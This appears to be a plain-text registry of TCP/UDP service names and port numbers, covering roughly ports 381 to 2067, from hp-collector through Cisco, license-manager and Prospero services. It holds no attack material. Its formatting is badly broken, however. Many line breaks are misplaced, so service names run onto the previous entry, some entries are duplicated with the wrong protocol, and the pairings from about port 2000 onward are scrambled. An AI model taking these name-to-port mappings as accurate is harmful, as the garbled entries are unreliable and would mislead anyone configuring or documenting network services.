hp-collector 381/udp hp performance data collector
hp-managed-node 382/tcp hp performance data managed node
hp-managed-node 382/udp hp performance data managed node
hp-alarm-mgr 383/tcp hp performance data alarm manager
hp-alarm-mgr 383/udp hp performance data alarm manager
arns 384/tcp A Remote Network Server System
arns 384/udp A Remote Network Server System
ibm-app 385/tcp IBM Application
ibm-app 385/tcp IBM Application
asa 386/tcp ASA Message Router Object Def.
asa 386/udp ASA Message Router Object Def.
aurp 387/tcp Appletalk Update-Based Routing Pro.
aurp 387/udp Appletalk Update-Based Routing Pro.
unidata-ldm 388/tcp Unidata LDM Version 4
unidata-ldm 388/udp Unidata LDM Version 4
ldap 389/tcp Lightweight Directory Access Protocol
ldap 389/udp Lightweight Directory Access Protocol
uis 390/tcp UISuis 390/udp UIS
synotics-relay 391/tcp SynOptics SNMP Relay Port
synotics-relay 391/udp SynOptics SNMP Relay Port
synotics-broker 392/tcp SynOptics Port Broker Port
synotics-broker 392/udp SynOptics Port Broker Port
dis 393/tcp Data Interpretation System
dis 393/udp Data Interpretation System
embl-ndt 394/tcp EMBL Nucleic Data Transfer
embl-ndt 394/udp EMBL Nucleic Data Transfer
netcp 395/tcp NETscout Control Protocol
netcp 395/udp NETscout Control Protocol
netware-ip 396/tcp Novell Netware over IP
netware-ip 396/udp Novell Netware over IP
mptn 397/tcp Multi Protocol Trans. Net.
mptn 397/udp Multi Protocol Trans. Net.
kryptolan 398/tcp Kryptolankryptolan
398/udp Kryptolan
# 399/tcp Unassigned#
399/udp Unassigned
work-sol 400/tcp Workstation Solutions
work-sol 400/udp Workstation Solutions
ups 401/tcp Uninterruptible Power Supply
ups 401/udp Uninterruptible Power Supply
genie 402/tcp Genie Protocol
genie 402/udp Genie Protocol
decap 403/tcp decapdecap
403/udp decap
nced 404/tcp ncednced
404/udp nced
ncld 405/tcp ncldncld
405/udp ncld
imsp 406/tcp Interactive Mail Support Protocol
imsp 406/udp Interactive Mail Support Protocol
Timbuktu 407/tcp Timbuktutimbuktu
407/udp Timbuktu
prm-sm 408/tcp Prospero Resource Manager Sys. Man.
prm-sm 408/udp Prospero Resource Manager Sys. Man.
prm-nm 409/tcp Prospero Resource Manager Node Man.
prm-nm 409/udp Prospero Resource Manager Node Man.
decladebug 410/tcp DECLadebug Remote Debug Protocol
decladebug 410/udp DECLadebug Remote Debug Protocol
rmt 411/tcp Remote MT Protocol
rmt 411/udp Remote MT Protocol
synoptics-trap 412/tcp Trap Convention Port
synoptics-trap 412/udp Trap Convention Port
smsp 413/tcp SMSPsmsp
413/udp SMSP
infoseek 414/tcp InfoSeekinfoseek
414/udp InfoSeek
bnet 415/tcp BNetbnet
415/udp BNet
silverplatter 416/tcp Silverplattersilverplatter
416/udp Silverplatter
onmux 417/tcp Onmuxonmux
417/udp Onmux
hyper-g 418/tcp Hyper-Ghyper-g
418/udp Hyper-G
ariel1 419/tcp Arielariel1
419/udp Ariel
smpte 420/tcp SMPTEsmpte
420/udp SMPTE
ariel2 421/tcp Arielariel2
421/udp Ariel
ariel3 422/tcp Arielariel3
422/udp Ariel
opc-job-start 423/tcp IBM Operations Planning and Control Start
opc-job-start 423/udp IBM Operations Planning and Control Start
opc-job-track 424/tcp IBM Operations Planning and Control Track
opc-job-track 424/udp IBM Operations Planning and Control Track
icad-el 425/tcp ICADicad-el
425/udp ICAD
smartsdp 426/tcp smartsdpsmartsdp
426/udp smartsdp
svrloc 427/tcp Server Location
svrloc 427/udp Server Location
ocs_cmu 428/udp OCS_CMUocs_amu
429/tcp OCS_AMU
ocs_amu 429/udp OCS_AMU
utmpsd 430/tcp UTMPSDutmpsd
430/udp UTMPSD
utmpcd 431/tcp UTMPCDutmpcd
431/udp UTMPCD
iasd 432/tcp IASDiasd
432/udp IASD
nnsp 433/tcp NNSPnnsp
433/udp NNSP
mobileip-agent 434/tcp MobileIP-Agent
mobileip-agent 434/udp MobileIP-Agentmobilip-mn
435/tcp MobilIP-MN
mobilip-mn 435/udp MobilIP-MN
dna-cml 436/tcp DNA-CMLdna-cml
436/udp DNA-CML
comscm 437/tcp comscmcomscm
437/udp comscm
dsfgw 438/tcp dsfgwdsfgw
438/udp dsfgw
dasp 439/tcp dasp Thomas Obermair
dasp 439/udp dasp tommy@inlab.m.eunet.de
sgcp 440/tcp sgcpsgcp
440/udp sgcp
decvms-sysmgt 441/tcp decvms-sysmgtdecvms-sysmgt
441/udp decvms-sysmgt
cvc_hostd 442/tcp cvc_hostdcvc_hostd
442/udp cvc_hostd
https 443/tcp https MComhttps
443/udp https MCom
snpp 444/tcp Simple Network Paging Protocol
snpp 444/udp Simple Network Paging Protocol
# [RFC1568]microsoft-ds
445/tcp Microsoft-DS
microsoft-ds 445/udp Microsoft-DS
ddm-rdb 446/tcp DDM-RDBddm-rdb
446/udp DDM-RDB
ddm-dfm 447/tcp DDM-RFMddm-dfm
447/udp DDM-RFM
ddm-byte 448/tcp DDM-BYTEddm-byte
448/udp DDM-BYTE
as-servermap 449/tcp AS Server Mapper
as-servermap 449/udp AS Server Mapper
tserver 450/tcp TServertserver
450/udp TServer
# 451-511 Unassigned
exec 512/tcp remote process execution;
# authentication performed using
# passwords and UNIX loppgin names
biff 512/udp used by mail system to notify users
# of new mail received; currently
# receives messages only from
# processes on the same machine
login 513/tcp remote login a la telnet;
# automatic authentication performed
# based on priviledged port numbers
# and distributed data bases which
# identify "authentication domains"
who 513/udp maintains data bases showing who's
# logged in to machines on a local
# net and the load average of the
# machine
cmd 514/tcp like exec, but automatic
# authentication is performed as for
# login server
syslog 514/udpprinter
515/tcp spooler
printer 515/udp spooler#
516/tcp Unassigned
# 516/udp Unassigned
talk 517/tcp like tenex link, but across
# machine - unfortunately, doesn't
# use link protocol (this is actually
# just a rendezvous port from which a
# tcp connection is established)
talk 517/udp like tenex link, but across
# machine - unfortunately, doesn't
# use link protocol (this is actually
# just a rendezvous port from which a
tcp connection is established)ntalk
518/tcp
ntalk 518/udp utime
519/tcp unixtime
utime 519/udp unixtime
efs 520/tcp extended file name server
router 520/udp local routing process (on site);
# uses variant of Xerox NS routing
# information protocol
# 521-524 Unassignedtimed
525/tcp timeserver
timed 525/udp timeservertempo
526/tcp newdate
tempo 526/udp newdate#
527-529 Unassigned
courier 530/tcp rpccourier
530/udp rpc
conference 531/tcp chatconference
531/udp chat
netnews 532/tcp readnewsnetnews
532/udp readnews
netwall 533/tcp for emergency broadcasts
netwall 533/udp for emergency broadcasts
# 534-538 Unassigned
apertus-ldp 539/tcp Apertus Technologies Load Determination
apertus-ldp 539/udp Apertus Technologies Load Determination
uucp 540/tcp uucpduucp 540/udp uucpd
uucp-rlogin 541/tcp uucp-rlogin Stuart Lynne
uucp-rlogin 541/udp uucp-rlogin sl@wimsey.com
# 542/tcp Unassigned#
542/udp Unassigned
klogin 543/tcpklogin
543/udp
kshell 544/tcp krcmdkshell
544/udp krcmd
# 545-549 Unassignednew-rwho
550/tcp new-who
new-rwho 550/udp new-who#
551-555 Unassigned
dsf 555/tcpdsf
555/udp
remotefs 556/tcp rfs serverremotefs
556/udp rfs server
# 557-559 Unassignedrmonitor
560/tcp rmonitord
rmonitor 560/udp rmonitordmonitor
561/tcp
monitor 561/udpchshell
562/tcp chcmd
chshell 562/udp chcmd#
563/tcp Unassigned
# 563/udp Unassigned
9pfs 564/tcp plan 9 file service
9pfs 564/udp plan 9 file servicewhoami
565/tcp whoami
whoami 565/udp whoami#
566-569 Unassigned
meter 570/tcp demonmeter
570/udp demon
meter 571/tcp udemonmeter
571/udp udemon
# 572-599 Unassignedipcserver
600/tcp Sun IPC server
ipcserver 600/udp Sun IPC servernqs
607/tcp nqs
nqs 607/udp nqs
urm 606/tcp Cray Unified Resource Manager
urm 606/udp Cray Unified Resource Manager
sift-uft 608/tcp Sender-Initiated/Unsolicited File Transfer
sift-uft 608/udp Sender-Initiated/Unsolicited File Transfer
npmp-trap 609/tcp npmp-trapnpmp-trap
609/udp npmp-trap
npmp-local 610/tcp npmp-localnpmp-local
610/udp npmp-local
npmp-gui 611/tcp npmp-guinpmp-gui
611/udp npmp-gui
ginad 634/tcp ginadginad
634/udp ginad
mdqs 666/tcpmdqs
666/udp
doom 666/tcp doom Id Software
doom 666/tcp doom Id Software
elcsd 704/tcp errlog copy/server daemon
elcsd 704/udp errlog copy/server daemon
entrustmanager 709/tcp EntrustManager
entrustmanager 709/udp EntrustManager
netviewdm1 729/tcp IBM NetView DM/6000 Server/Client
netviewdm1 729/udp IBM NetView DM/6000 Server/Client
netviewdm2 730/tcp IBM NetView DM/6000 send/tcp
netviewdm2 730/udp IBM NetView DM/6000 send/tcp
netviewdm3 731/tcp IBM NetView DM/6000 receive/tcp
netviewdm3 731/udp IBM NetView DM/6000 receive/tcp
netgw 741/tcp netGWnetgw
741/udp netGW
netrcs 742/tcp Network based Rev. Cont. Sys.
netrcs 742/udp Network based Rev. Cont. Sys.
flexlm 744/tcp Flexible License Manager
flexlm 744/udp Flexible License Manager
fujitsu-dev 747/tcp Fujitsu Device Control
fujitsu-dev 747/udp Fujitsu Device Control
ris-cm 748/tcp Russell Info Sci Calendar Manager
ris-cm 748/udp Russell Info Sci Calendar Manager
kerberos-adm 749/tcp kerberos administration
kerberos-adm 749/udp kerberos administrationrfile
750/tcp
loadav 750/udppump
751/tcppump
751/udp
qrh 752/tcpqrh
752/udprrh
753/tcp
rrh 753/udptell
754/tcp send
tell 754/udp sendnlogin
758/tcpnlogin
758/udp
con 759/tcpcon
759/udp
ns 760/tcpns
760/udprxe
761/tcp
rxe 761/udpquotad
762/tcpquotad
762/udp
cycleserv 763/tcpcycleserv
763/udpomserv
764/tcp
omserv 764/udpwebster
765/tcpwebster
765/udp
phonebook 767/tcp phonephonebook
767/udp phone
vid 769/tcpvid
769/udpcadlock
770/tcp
cadlock 770/udprtip
771/tcprtip
771/udp
cycleserv2 772/tcpcycleserv2
772/udpsubmit
773/tcp
notify 773/udprpasswd
774/tcpacmaint_dbd
774/udp
entomb 775/tcpacmaint_transd
775/udpwpages
776/tcp
wpages 776/udpwpgs
780/tcpwpgs
780/udp
concert 786/tcp Concertconcert
786/udp Concert
mdbs_daemon 800/tcpmdbs_daemon
800/udpdevice
801/tcp
device 801/udpxtreelic
996/tcp Central Point Software
xtreelic 996/udp Central Point Software
maitrd 997/tcpmaitrd
997/udpbusboy
998/tcp
puparp 998/udpgarcon
999/tcp
applix 999/udp Applix ac
puprouter 999/tcppuprouter
999/udpcadlock
1000/tcp
ock 1000/udp
1023/tcp Reserved
1024/udp Reserved
1024/tcp Reserved
1024/udp Reserved
blackjack 1025/tcp network blackjack
blackjack 1025/udp network blackjackiad1
1030/tcp BBN IAD
iad1 1030/udp BBN IADiad2
1031/tcp BBN IAD
iad2 1031/udp BBN IADiad3
1032/tcp BBN IAD
iad3 1032/udp BBN IAD
instl_boots 1067/tcp Installation Bootstrap Proto. Serv.
instl_boots 1067/udp Installation Bootstrap Proto. Serv.
instl_bootc 1068/tcp Installation Bootstrap Proto. Cli.
instl_bootc 1068/udp Installation Bootstrap Proto. Cli.
socks 1080/tcp Sockssocks
1080/udp Socks
ansoft-lm-1 1083/tcp Anasoft License Manager
ansoft-lm-1 1083/udp Anasoft License Manager
ansoft-lm-2 1084/tcp Anasoft License Manager
ansoft-lm-2 1084/udp Anasoft License Manager
nfa 1155/tcp Network File Access
nfa 1155/udp Network File Access
nerv 1222/tcp SNI R&D network
nerv 1222/udp SNI R&D network
hermes 1248/tcphermes
1248/udp
alta-ana-lm 1346/tcp Alta Analytics License Manager
alta-ana-lm 1346/udp Alta Analytics License Manager
bbn-mmc 1347/tcp multi media conferencing
bbn-mmc 1347/udp multi media conferencing
bbn-mmx 1348/tcp multi media conferencing
bbn-mmx 1348/udp multi media conferencing
sbook 1349/tcp Registration Network Protocol
sbook 1349/udp Registration Network Protocol
editbench 1350/tcp Registration Network Protocol
editbench 1350/udp Registration Network Protocol
equationbuilder 1351/tcp Digital Tool Works (MIT)
equationbuilder 1351/udp Digital Tool Works (MIT)
lotusnote 1352/tcp Lotus Notelotusnote
1352/udp Lotus Note
relief 1353/tcp Relief Consulting
relief 1353/udp Relief Consulting
rightbrain 1354/tcp RightBrain Software
rightbrain 1354/udp RightBrain Software
intuitive edge 1355/tcp Intuitive Edge
intuitive edge 1355/udp Intuitive Edge
cuillamartin 1356/tcp CuillaMartin Company
cuillamartin 1356/udp CuillaMartin Company
pegboard 1357/tcp Electronic PegBoard
pegboard 1357/udp Electronic PegBoard
connlcli 1358/tcp CONNLCLIconnlcli
1358/udp CONNLCLI
ftsrv 1359/tcp FTSRVftsrv
1359/udp FTSRV
mimer 1360/tcp MIMERmimer
1360/udp MIMER
linx 1361/tcp LinXlinx
1361/udp LinX
timeflies 1362/tcp TimeFliestimeflies
1362/udp TimeFlies
ndm-requester 1363/tcp Network DataMover Requester
ndm-requester 1363/udp Network DataMover Requester
ndm-server 1364/tcp Network DataMover Server
ndm-server 1364/udp Network DataMover Server
adapt-sna 1365/tcp Network Software Associates
adapt-sna 1365/udp Network Software Associates
netware-csp 1366/tcp Novell NetWare Comm Service Platform
netware-csp 1366/udp Novell NetWare Comm Service Platform
dcs 1367/tcp DCSdcs
1367/udp DCS
screencast 1368/tcp ScreenCastscreencast
1368/udp ScreenCast
gv-us 1369/tcp GlobalView to Unix Shell
gv-us 1369/udp GlobalView to Unix Shell
us-gv 1370/tcp Unix Shell to GlobalView
us-gv 1370/udp Unix Shell to GlobalView
fc-cli 1371/tcp Fujitsu Config Protocol
fc-cli 1371/udp Fujitsu Config Protocol
fc-ser 1372/tcp Fujitsu Config Protocol
fc-ser 1372/udp Fujitsu Config Protocol
chromagrafx 1373/tcp Chromagrafxchromagrafx
1373/udp Chromagrafx
molly 1374/tcp EPI Software Systems
molly 1374/udp EPI Software Systems
bytex 1375/tcp Bytexbytex
1375/udp Bytex
ibm-pps 1376/tcp IBM Person to Person Software
ibm-pps 1376/udp IBM Person to Person Software
cichlid 1377/tcp Cichlid License Manager
cichlid 1377/udp Cichlid License Manager
elan 1378/tcp Elan License Manager
elan 1378/udp Elan License Manager
dbreporter 1379/tcp Integrity Solutions
dbreporter 1379/udp Integrity Solutions
telesis-licman 1380/tcp Telesis Network License Manager
telesis-licman 1380/udp Telesis Network License Manager
apple-licman 1381/tcp Apple Network License Manager
apple-licman 1381/udp Apple Network License Manager
udt_os 1382/tcpudt_os 1382/udp
gwha 1383/tcp GW Hannaway Network License Manager
gwha 1383/udp GW Hannaway Network License Manager
os-licman 1384/tcp Objective Solutions License Manager
os-licman 1384/udp Objective Solutions License Manager
atex_elmd 1385/tcp Atex Publishing License Manager
atex_elmd 1385/udp Atex Publishing License Manager
checksum 1386/tcp CheckSum License Manager
checksum 1386/udp CheckSum License Manager
cadsi-lm 1387/tcp Computer Aided Design Software Inc LM
cadsi-lm 1387/udp Computer Aided Design Software Inc LM
objective-dbc 1388/tcp Objective Solutions DataBase Cache
objective-dbc 1388/udp Objective Solutions DataBase Cache
iclpv-dm 1389/tcp Document Manager
iclpv-dm 1389/udp Document Manager
iclpv-sc 1390/tcp Storage Controller
iclpv-sc 1390/udp Storage Controller
iclpv-sas 1391/tcp Storage Access Server
iclpv-sas 1391/udp Storage Access Server
iclpv-pm 1392/tcp Print Managericlpv-pm
1392/udp Print Manager
iclpv-nls 1393/tcp Network Log Server
iclpv-nls 1393/udp Network Log Server
iclpv-nlc 1394/tcp Network Log Client
iclpv-nlc 1394/udp Network Log Client
iclpv-wsm 1395/tcp PC Workstation Manager software
iclpv-wsm 1395/udp PC Workstation Manager software
dvl-activemail 1396/tcp DVL Active Mail
dvl-activemail 1396/udp DVL Active Mail
audio-activmail 1397/tcp Audio Active Mail
audio-activmail 1397/udp Audio Active Mail
video-activmail 1398/tcp Video Active Mail
video-activmail 1398/udp Video Active Mail
cadkey-licman 1399/tcp Cadkey License Manager
cadkey-licman 1399/udp Cadkey License Manager
cadkey-tablet 1400/tcp Cadkey Tablet Daemon
cadkey-tablet 1400/udp Cadkey Tablet Daemon
goldleaf-licman 1401/tcp Goldleaf License Manager
goldleaf-licman 1401/udp Goldleaf License Manager
prm-sm-np 1402/tcp Prospero Resource Manager
prm-sm-np 1402/udp Prospero Resource Manager
prm-nm-np 1403/tcp Prospero Resource Manager
prm-nm-np 1403/udp Prospero Resource Manager
igi-lm 1404/tcp Infinite Graphics License Manager
igi-lm 1404/udp Infinite Graphics License Manager
ibm-res 1405/tcp IBM Remote Execution Starter
ibm-res 1405/udp IBM Remote Execution Starter
netlabs-lm 1406/tcp NetLabs License Manager
netlabs-lm 1406/udp NetLabs License Manager
dbsa-lm 1407/tcp DBSA License Manager
dbsa-lm 1407/udp DBSA License Manager
sophia-lm 1408/tcp Sophia License Manager
sophia-lm 1408/udp Sophia License Manager
here-lm 1409/tcp Here License Manager
here-lm 1409/udp Here License Manager
hiq 1410/tcp HiQ License Manager
hiq 1410/udp HiQ License Manager
af 1411/tcp AudioFileaf
1411/udp AudioFile
innosys 1412/tcp InnoSysinnosys
1412/udp InnoSys
innosys-acl 1413/tcp Innosys-ACLinnosys-acl
1413/udp Innosys-ACL
ibm-mqseries 1414/tcp IBM MQSeriesibm-mqseries
1414/udp IBM MQSeries
dbstar 1415/tcp DBStardbstar
1415/udp DBStar
novell-lu6.2 1416/tcp Novell LU6.2novell-lu6.2
1416/udp Novell LU6.2
timbuktu-srv1 1417/tcp Timbuktu Service 1 Port
timbuktu-srv1 1417/tcp Timbuktu Service 1 Port
timbuktu-srv2 1418/tcp Timbuktu Service 2 Port
timbuktu-srv2 1418/udp Timbuktu Service 2 Port
timbuktu-srv3 1419/tcp Timbuktu Service 3 Port
timbuktu-srv3 1419/udp Timbuktu Service 3 Port
timbuktu-srv4 1420/tcp Timbuktu Service 4 Port
timbuktu-srv4 1420/udp Timbuktu Service 4 Port
gandalf-lm 1421/tcp Gandalf License Manager
gandalf-lm 1421/udp Gandalf License Manager
autodesk-lm 1422/tcp Autodesk License Manager
autodesk-lm 1422/udp Autodesk License Manager
essbase 1423/tcp Essbase Arbor Software
essbase 1423/udp Essbase Arbor Software
hybrid 1424/tcp Hybrid Encryption Protocol
hybrid 1424/udp Hybrid Encryption Protocol
zion-lm 1425/tcp Zion Software License Manager
zion-lm 1425/udp Zion Software License Manager
sas-1 1426/tcp Satellite-data Acquisition System 1
sas-1 1426/udp Satellite-data Acquisition System 1
mloadd 1427/tcp mloadd monitoring tool
mloadd 1427/udp mloadd monitoring tool
informatik-lm 1428/tcp Informatik License Manager
informatik-lm 1428/udp Informatik License Manager
nms 1429/tcp Hypercom NMSnms
1429/udp Hypercom NMS
tpdu 1430/tcp Hypercom TPDUtpdu
1430/udp Hypercom TPDU
rgtp 1431/tcp Reverse Gosip Transport
rgtp 1431/udp Reverse Gosip Transport
blueberry-lm 1432/tcp Blueberry Software License Manager
blueberry-lm 1432/udp Blueberry Software License Manager
ms-sql-s 1433/tcp Microsoft-SQL-Server
ms-sql-s 1433/udp Microsoft-SQL-Server
ms-sql-m 1434/tcp Microsoft-SQL-Monitor
ms-sql-m 1434/udp Microsoft-SQL-Monitor
ibm-cics 1435/tcp IBM CISCibm-cics
1435/udp IBM CISC
sas-2 1436/tcp Satellite-data Acquisition System 2
sas-2 1436/udp Satellite-data Acquisition System 2
tabula 1437/tcp Tabulatabula
1437/udp Tabula
eicon-server 1438/tcp Eicon Security Agent/Server
eicon-server 1438/udp Eicon Security Agent/Server
eicon-x25 1439/tcp Eicon X25/SNA Gateway
eicon-x25 1439/udp Eicon X25/SNA Gateway
eicon-slp 1440/tcp Eicon Service Location Protocol
eicon-slp 1440/udp Eicon Service Location Protocol
cadis-1 1441/tcp Cadis License Management
cadis-1 1441/udp Cadis License Management
cadis-2 1442/tcp Cadis License Management
cadis-2 1442/udp Cadis License Management
ies-lm 1443/tcp Integrated Engineering Software
ies-lm 1443/udp Integrated Engineering Software
marcam-lm 1444/tcp Marcam License Management
marcam-lm 1444/udp Marcam License Management
proxima-lm 1445/tcp Proxima License Manager
proxima-lm 1445/udp Proxima License Manager
ora-lm 1446/tcp Optical Research Associates License Manager
ora-lm 1446/udp Optical Research Associates License Manager
apri-lm 1447/tcp Applied Parallel Research LM
apri-lm 1447/udp Applied Parallel Research LM
oc-lm 1448/tcp OpenConnect License Manager
oc-lm 1448/udp OpenConnect License Manager
peport 1449/tcp PEportpeport
1449/udp PEport
dwf 1450/tcp Tandem Distributed Workbench Facility
dwf 1450/udp Tandem Distributed Workbench Facility
infoman 1451/tcp IBM Information Management
infoman 1451/udp IBM Information Management
gtegsc-lm 1452/tcp GTE Government Systems License Man
gtegsc-lm 1452/udp GTE Government Systems License Man
genie-lm 1453/tcp Genie License Manager
genie-lm 1453/udp Genie License Manager
interhdl_elmd 1454/tcp interHDL License Manager
interhdl_elmd 1454/tcp interHDL License Manager
esl-lm 1455/tcp ESL License Manager
esl-lm 1455/udp ESL License Manager
dca 1456/tcp DCAdca
1456/udp DCA
valisys-lm 1457/tcp Valisys License Manager
valisys-lm 1457/udp Valisys License Manager
nrcabq-lm 1458/tcp Nichols Research Corp.
nrcabq-lm 1458/udp Nichols Research Corp.
proshare1 1459/tcp Proshare Notebook Application
proshare1 1459/udp Proshare Notebook Application
proshare2 1460/tcp Proshare Notebook Application
proshare2 1460/udp Proshare Notebook Application
ibm_wrless_lan 1461/tcp IBM Wireless LAN
ibm_wrless_lan 1461/udp IBM Wireless LAN
world-lm 1462/tcp World License Manager
world-lm 1462/udp World License Manager
nucleus 1463/tcp Nucleusnucleus
1463/udp Nucleus
msl_lmd 1464/tcp MSL License Manager
msl_lmd 1464/udp MSL License Manager
pipes 1465/tcp Pipes Platform
pipes 1465/udp Pipes Platform mfarlin@peerlogic.com
oceansoft-lm 1466/tcp Ocean Software License Manager
oceansoft-lm 1466/udp Ocean Software License Manager
csdmbase 1467/tcp CSDMBASEcsdmbase
1467/udp CSDMBASE
csdm 1468/tcp CSDMcsdm
1468/udp CSDM
aal-lm 1469/tcp Active Analysis Limited License Manager
aal-lm 1469/udp Active Analysis Limited License Manager
uaiact 1470/tcp Universal Analytics
uaiact 1470/udp Universal Analytics
csdmbase 1471/tcp csdmbasecsdmbase
1471/udp csdmbase
csdm 1472/tcp csdmcsdm
1472/udp csdm
openmath 1473/tcp OpenMathopenmath
1473/udp OpenMath
telefinder 1474/tcp Telefindertelefinder
1474/udp Telefinder
taligent-lm 1475/tcp Taligent License Manager
taligent-lm 1475/udp Taligent License Manager
clvm-cfg 1476/tcp clvm-cfgclvm-cfg
1476/udp clvm-cfg
ms-sna-server 1477/tcp ms-sna-server
ms-sna-server 1477/udp ms-sna-serverms-sna-base
1478/tcp ms-sna-base
ms-sna-base 1478/udp ms-sna-base
dberegister 1479/tcp dberegisterdberegister
1479/udp dberegister
pacerforum 1480/tcp PacerForumpacerforum
1480/udp PacerForum
airs 1481/tcp AIRSairs
1481/udp AIRS
miteksys-lm 1482/tcp Miteksys License Manager
miteksys-lm 1482/udp Miteksys License Manager
afs 1483/tcp AFS License Manager
afs 1483/udp AFS License Manager
confluent 1484/tcp Confluent License Manager
confluent 1484/udp Confluent License Manager
lansource 1485/tcp LANSourcelansource
1485/udp LANSource
nms_topo_serv 1486/tcp nms_topo_serv
nms_topo_serv 1486/udp nms_topo_serv
localinfosrvr 1487/tcp LocalInfoSrvr
localinfosrvr 1487/udp LocalInfoSrvr
docstor 1488/tcp DocStordocstor
1488/udp DocStor
dmdocbroker 1489/tcp dmdocbrokerdmdocbroker
1489/udp dmdocbroker
insitu-conf 1490/tcp insitu-confinsitu-conf
1490/udp insitu-conf
anynetgateway 1491/tcp anynetgateway
anynetgateway 1491/udp anynetgateway
stone-design-1 1492/tcp stone-design-1
stone-design-1 1492/udp stone-design-1
netmap_lm 1493/tcp netmap_lmnetmap_lm
1493/udp netmap_lm
ica 1494/tcp icaica
1494/udp ica
cvc 1495/tcp cvccvc
1495/udp cvc
liberty-lm 1496/tcp liberty-lmliberty-lm
1496/udp liberty-lm
rfx-lm 1497/tcp rfx-lmrfx-lm
1497/udp rfx-lm
watcom-sql 1498/tcp Watcom-SQLwatcom-sql
1498/udp Watcom-SQL
fhc 1499/tcp Federico Heinz Consultora
fhc 1499/udp Federico Heinz Consultora
vlsi-lm 1500/tcp VLSI License Manager
vlsi-lm 1500/udp VLSI License Manager
sas-3 1501/tcp Satellite-data Acquisition System 3
sas-3 1501/udp Satellite-data Acquisition System 3
shivadiscovery 1502/tcp Shivashivadiscovery
1502/udp Shiva
imtc-mcs 1503/tcp Databeamimtc-mcs
1503/udp Databeam
evb-elm 1504/tcp EVB Software Engineering License Manager
evb-elm 1504/udp EVB Software Engineering License Manager
funkproxy 1505/tcp Funk Software, Inc.
funkproxy 1505/udp Funk Software, Inc.
# 1506-1523 Unassignedingreslock
1524/tcp ingres
ingreslock 1524/udp ingresorasrv
1525/tcp oracle
orasrv 1525/udp oracle
prospero-np 1525/tcp Prospero Directory Service non-priv
prospero-np 1525/udp Prospero Directory Service non-priv
pdap-np 1526/tcp Prospero Data Access Prot non-priv
pdap-np 1526/udp Prospero Data Access Prot non-priv
tlisrv 1527/tcp oracletlisrv
1527/udp oracle
coauthor 1529/tcp oraclecoauthor
1529/udp oracle
issd 1600/tcpissd
1600/udpnkd
1650/tcp
nkd 1650/udpproshareaudio
1651/tcp proshare conf audio
proshareaudio 1651/udp proshare conf audio
prosharevideo 1652/tcp proshare conf video
prosharevideo 1652/udp proshare conf video
prosharedata 1653/tcp proshare conf data
prosharedata 1653/udp proshare conf data
prosharerequest 1654/tcp proshare conf request
prosharerequest 1654/udp proshare conf request
prosharenotify 1655/tcp proshare conf notify
prosharenotify 1655/udp proshare conf notify
netview-aix-1 1661/tcp netview-aix-1netview-aix-1
1661/udp netview-aix-1
netview-aix-2 1662/tcp netview-aix-2netview-aix-2
1662/udp netview-aix-2
netview-aix-3 1663/tcp netview-aix-3netview-aix-3
1663/udp netview-aix-3
netview-aix-4 1664/tcp netview-aix-4netview-aix-4
1664/udp netview-aix-4
netview-aix-5 1665/tcp netview-aix-5netview-aix-5
1665/udp netview-aix-5
netview-aix-6 1666/tcp netview-aix-6netview-aix-6
1666/udp netview-aix-6
licensedaemon 1986/tcp cisco license management
licensedaemon 1986/udp cisco license management
tr-rsrb-p1 1987/tcp cisco RSRB Priority 1 port
tr-rsrb-p1 1987/udp cisco RSRB Priority 1 port
tr-rsrb-p2 1988/tcp cisco RSRB Priority 2 port
tr-rsrb-p2 1988/udp cisco RSRB Priority 2 port
tr-rsrb-p3 1989/tcp cisco RSRB Priority 3 port
tr-rsrb-p3 1989/udp cisco RSRB Priority 3 port
stun-p1 1990/tcp cisco STUN Priority 1 port
stun-p1 1990/udp cisco STUN Priority 1 port
stun-p2 1991/tcp cisco STUN Priority 2 port
stun-p2 1991/udp cisco STUN Priority 2 port
stun-p3 1992/tcp cisco STUN Priority 3 port
stun-p3 1992/udp cisco STUN Priority 3 port
snmp-tcp-port 1993/tcp cisco SNMP TCP port
snmp-tcp-port 1993/udp cisco SNMP TCP port
stun-port 1994/tcp cisco serial tunnel port
stun-port 1994/udp cisco serial tunnel port
perf-port 1995/tcp cisco perf port
perf-port 1995/udp cisco perf port
tr-rsrb-port 1996/tcp cisco Remote SRB port
tr-rsrb-port 1996/udp cisco Remote SRB port
gdp-port 1997/tcp cisco Gateway Discovery Protocol
gdp-port 1997/udp cisco Gateway Discovery Protocol
x25-svc-port 1998/tcp cisco X.25 service (XOT)
x25-svc-port 1998/udp cisco X.25 service (XOT)
tcp-id-port 1999/tcp cisco identification port
tcp-id-port 1999/udp cisco identification portcallbook
2000/tcp
callbook 2000/udpdc
2001/tcp
wizard 2001/udp curryglobe
2002/tcp
globe 2002/udpmailbox
2004/tcp
emce 2004/udp CCWS mm confberknet
2005/tcp
oracle 2005/udpinvokator
2006/tcpraid-cc
2006/udp raid
dectalk 2007/tcpraid-am
2007/udpconf
2008/tcp
terminaldb 2008/udpnews
2009/tcpwhosockami
2009/udp
search 2010/tcppipe_server
2010/udpraid-cc
2011/tcp raid
servserv 2011/udpttyinfo
2012/tcpraid-ac
2012/udp
raid-am 2013/tcpraid-cd
2013/udptroff
2014/tcp
raid-sf 2014/udpcypress
2015/tcpraid-cs
2015/udp
bootserver 2016/tcpbootserver
2016/udpcypress-stat
2017/tcp
bootclient 2017/udpterminaldb
2018/tcprellpack
2018/udp
whosockami 2019/tcpabout 2019/udpxinupageserver 2020/tcp
xinupageserver 2020/udpservexec 2021/tcpxinuexpansion1 2021/udp
down 2022/tcpxinuexpansion2 2022/udpxinuexpansion3 2023/tcp
xinuexpansion3 2023/udpxinuexpansion4 2024/tcpxinuexpansion4 2024/udp
ellpack 2025/tcpxribs 2025/udpscrabble 2026/tcp
scrabble 2026/udpshadowserver 2027/tcpshadowserver 2027/udp
submitserver 2028/tcpsubmitserver 2028/udpdevice2 2030/tcp
device2 2030/udpblackboard 2032/tcpblackboard 2032/udp
glogger 2033/tcpglogger 2033/udpscoremgr 2034/tcp
scoremgr 2034/udpimsldoc 2035/tcpimsldoc 2035/udp
objectmanager 2038/tcpobjectmanager 2038/udplam 2040/tcp
lam 2040/udpinterbase 2041/tcpinterbase 2041/udp
isis 2042/tcpisis 2042/udpisis-bcast 2043/tcp
isis-bcast 2043/udprimsl 2044/tcprimsl 2044/udp
cdfunc 2045/tcpcdfunc 2045/udpsdfunc 2046/tcp
sdfunc 2046/udpdls 2047/tcpdls 2047/udp
dls-monitor 2048/tcpdls-monitor 2048/udpshilp 2049/tcp
shilp 2049/udp
dlsrpn 2065/tcp Data Link Switch Read Port Number
dlsrpn 2065/udp Data Link Switch Read Port Number
dlswpn 2067/tcp Data Link Switch Write Port Number
